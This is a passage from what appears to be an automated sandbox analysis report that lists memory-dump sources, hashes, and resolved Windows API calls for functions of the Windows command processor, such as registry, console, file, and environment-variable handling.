                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                    • Instruction ID: d5ba1e2bf40c7b1d1f4ffaa3986e1c7fc2fc97f9b54f7ef1ab323288824fd5dd
                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                    • Instruction Fuzzy Hash: EBD0A73D5011809DFF03EB10C61876877F1BB04208F5C109B8001655D1C3354909C600
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A6DB40, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                    • Instruction ID: 9ee681df7beac12dcb08c7ce94b6ee7c445d27f5dec346dfe15f6875510bac24
                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                    • Instruction Fuzzy Hash: 4CC08C30380B01AAEB22AF20CE01B00B6A0BB40B41F4804A56300DA0F0EB7CD801E600
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AEA537, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                    • Instruction ID: c61cb66fd4be35181b23deed4ff3ece7dc691ccee2d5885e4dcd3792657aefb2
                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                    • Instruction Fuzzy Hash: 80C01236040248BBCB126F81CD00F057B2AFB54760F004011B5440A5608536D970D644
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A776E2, Relevance: .0, Instructions: 10COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                    • Instruction ID: 5d882878d0af17ceece895e5e9d556e4c0ae89f8f24694a914fb95f908de0193
                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                    • Instruction Fuzzy Hash: F9C08C741412805AEB3AE708CE60B303654AB08608F5C059DAB010D5A1C36EA823C208
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A936CC, Relevance: .0, Instructions: 10COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                    • Instruction ID: 680cc5728056c0c24c2d16ca3e6dd0fd06a5f7bcda4b41181d8f385c13b16cde
                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                    • Instruction Fuzzy Hash: 35C02B78150440BBEF25AF30CE00F15B3A4FB00B21F6C03697320495F0E62C9C00D100
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A83A1C, Relevance: .0, Instructions: 10COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                    • Instruction ID: da539d10d40418798d348b78fd338599ff838e9d45722841ce7ba7e07affa44a
                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                    • Instruction Fuzzy Hash: BEC04C36180648BBC712AF46DD01F15BB69E794B60F154021B6040A6619676ED61D598
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A6AD30, Relevance: .0, Instructions: 10COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                    • Instruction ID: 62c76db7d2417a9dd305a826db58e5f7052084c1870aa15594703afca553e106
                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                    • Instruction Fuzzy Hash: 4FC08C32080248BBC712AB45CE00F017B29E790B60F100021B6040A6618932E860D588
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A87D50, Relevance: .0, Instructions: 7COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                    • Instruction ID: 3967fcde23310319a26335afc8c34c978fe677979ff828d604844630943ab251
                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                    • Instruction Fuzzy Hash: C5B092343019408FCE16EF18C080B1533E8BB44A44B9800D4E400CBA20D22AE8008900
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A92ACB, Relevance: .0, Instructions: 5COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                    • Instruction ID: 2c0664a9196fdc88b1e9866064006fbce9332780931a9ddf16e0957bb6052dc9
                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                    • Instruction Fuzzy Hash: 42B01232D11540CFCF02EF40CF50F197731FB40750F0584D290012BA30C228AC01CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3D27, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 299memorylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                    • _get_osfhandle.MSVCRT ref: 011E3D85
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                    • _get_osfhandle.MSVCRT ref: 011E3D99
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06D8
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06EF
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E071E
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E0750
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                      • Part of subcall function 011E3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                      • Part of subcall function 011E3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                      • Part of subcall function 011E41DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 011E423D
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 011E427D
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 011E42B7
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 011E4307
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 011E4341
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 011E3E9E
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E3EAF
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 011E3EC0
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3EC7
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 011E3EDC
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 011E3F07
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 011E3F18
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 011E3F2E
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 011E3F3F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3F5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                    • API String ID: 570592814-3021193919
                                    • Opcode ID: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                    • Instruction ID: 646eff5731a0c69d76884a43f1222fa307c814a17551d9d95fe4b3ba8e390533
                                    • Opcode Fuzzy Hash: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                    • Instruction Fuzzy Hash: 2BA1A231A50701ABDF2DEBE9B81DAAA3BF6FBA4704B04415DE506C7188DF70D981CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E41DD, Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 311registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 011E423D
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 011E427D
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 011E42B7
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 011E4307
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 011E4341
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 011E4391
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 011E4401
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 011E449A
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011E44AE
                                    • time.MSVCRT ref: 011E44C8
                                    • srand.MSVCRT ref: 011E44CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: QueryValue$CloseOpensrandtime
                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                    • API String ID: 145004033-3846321370
                                    • Opcode ID: cce8405e04c4eb498425845ed1d54e268bfa5c9ea81bf0b4475f6d69d70143dc
                                    • Instruction ID: ffefbe0cc6f0beff65443c48b02f25f17f1f507bba8bfdb992daab111572123b
                                    • Opcode Fuzzy Hash: cce8405e04c4eb498425845ed1d54e268bfa5c9ea81bf0b4475f6d69d70143dc
                                    • Instruction Fuzzy Hash: 0CC19735900669DADF3ACB94DD4CBD977B8FB08706F0040E6E689E2584DBB05AC4CF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F65A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011F6613
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 011F668C
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F6B01
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • _get_osfhandle.MSVCRT ref: 011F66E9
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F66F1
                                    • _get_osfhandle.MSVCRT ref: 011F6701
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6709
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011F6739
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F6741
                                    • memmove.MSVCRT ref: 011F678F
                                    • _get_osfhandle.MSVCRT ref: 011F6812
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F681A
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 011F6882
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 011F692B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011F6932
                                    • _get_osfhandle.MSVCRT ref: 011F697E
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6986
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 011F6A1E
                                    • _get_osfhandle.MSVCRT ref: 011F6A76
                                    • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6A7E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6AAD
                                      • Part of subcall function 011F9953: _get_osfhandle.MSVCRT ref: 011F9956
                                      • Part of subcall function 011F9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F995E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                    • String ID: DPATH
                                    • API String ID: 1247154890-2010427443
                                    • Opcode ID: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                    • Instruction ID: 13f2b848f647374717876c164d168e2c41af6bb4fe1aa5d519398cf27b700200
                                    • Opcode Fuzzy Hash: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                    • Instruction Fuzzy Hash: F8F1B271608342DFDB28DF29D848B6BBBE4FB98714F044A2DF68597284EB70D844CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E44FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E4516
                                    • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 011E4523
                                      • Part of subcall function 011E465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                      • Part of subcall function 011E465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 011E4538
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 011E4555
                                    • _setjmp3.MSVCRT ref: 011E45BD
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 011E45EE
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E45FF
                                    • exit.MSVCRT ref: 011E4625
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 011EE707
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011EE710
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E4770
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E478C
                                      • Part of subcall function 011E46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                      • Part of subcall function 011E46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                      • Part of subcall function 011E46D8: memset.MSVCRT ref: 011E4703
                                      • Part of subcall function 011E3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                      • Part of subcall function 011E3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                      • Part of subcall function 011E3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                      • Part of subcall function 011E3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D85
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D99
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • _setjmp3.MSVCRT ref: 011EE785
                                    Strings
                                    • Software\Policies\Microsoft\Windows\System, xrefs: 011E454B
                                    • DisableCMD, xrefs: 011EE6FF
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                    • API String ID: 4268540630-1920437939
                                    • Opcode ID: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction ID: 11d40929f194e6a4fe30daf578201b1c5c5b5d6784bd68168e57703f76d61b55
                                    • Opcode Fuzzy Hash: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction Fuzzy Hash: C171D571E41A0AEEEF3DEBF5BC9CA7E3BE9EB18218B140429E501D2185DF70C4408B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DCFBC, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • _wcsicmp.MSVCRT ref: 011DD005
                                    • _wcsicmp.MSVCRT ref: 011DD01B
                                    • _wcsicmp.MSVCRT ref: 011DD031
                                    • _wcsicmp.MSVCRT ref: 011DD047
                                    • _wcsicmp.MSVCRT ref: 011DD05D
                                    • _wcsicmp.MSVCRT ref: 011DD073
                                    • _wcsicmp.MSVCRT ref: 011DD085
                                    • _wcsicmp.MSVCRT ref: 011DD09B
                                      • Part of subcall function 011D96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                      • Part of subcall function 011D96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                      • Part of subcall function 011D96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                      • Part of subcall function 011D96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                    • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                    • API String ID: 2447294730-2301591722
                                    • Opcode ID: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction ID: 5a0ed5444746943e53c27e84cdc6754e49d4beb7520d823db971327570d2ce85
